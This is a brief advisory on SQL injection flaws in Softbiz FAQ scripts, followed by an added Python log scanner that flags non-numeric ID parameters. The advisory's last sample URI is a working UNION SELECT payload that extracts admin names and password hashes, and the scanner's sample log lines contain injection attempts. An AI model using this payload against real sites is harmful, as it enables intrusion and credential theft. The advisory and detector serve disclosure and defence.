Softbiz FAQ Multiple SQL Injection Vulnerabilities
No exploit is required. Sample URIs have been provided:

http://www.example.com/index.php?cid=[SQL]
http://www.example.com/faq_qanda.php?id=[SQL]
http://www.example.com/refer_friend.php?id=[SQL]
http://www.example.com/print_article.php?id=[SQL]
http://www.example.com/add_comment.php?id=[SQL]
http://www.example.com/faq/faq_qanda.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--
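
For defenders reviewing web server logs, the following added example (not part of the original advisory or of Softbiz FAQ) flags requests to the scripts listed above whose `cid` or `id` value is not a plain decimal number. It assumes common/combined access-log format and that legitimate values of these parameters are numeric IDs; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs taken from the sample URIs in this advisory.
AFFECTED = {
    "index.php": "cid",
    "faq_qanda.php": "id",
    "refer_friend.php": "id",
    "print_article.php": "id",
    "add_comment.php": "id",
}

# Assumption: Apache/nginx common or combined log format.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Assumption: legitimate values of these parameters are plain decimal IDs.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def suspicious_requests(lines):
    """Return (client, script, param, value) for each non-numeric ID seen."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1]
        param = AFFECTED.get(script)
        if param is None:
            continue
        # parse_qsl URL-decodes, so %27 and '+' encodings are normalised first.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == param and not NUMERIC_ID.fullmatch(value):
                hits.append((client, script, param, value))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /faq/faq_qanda.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /faq/faq_qanda.php?id=-1+union+select+null HTTP/1.1" 200 734',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?cid=3%27 HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /print_article.php?id=7 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same numeric-only rule can be enforced at the application or WAF layer for these parameters, again under the assumption that they only ever carry integer IDs.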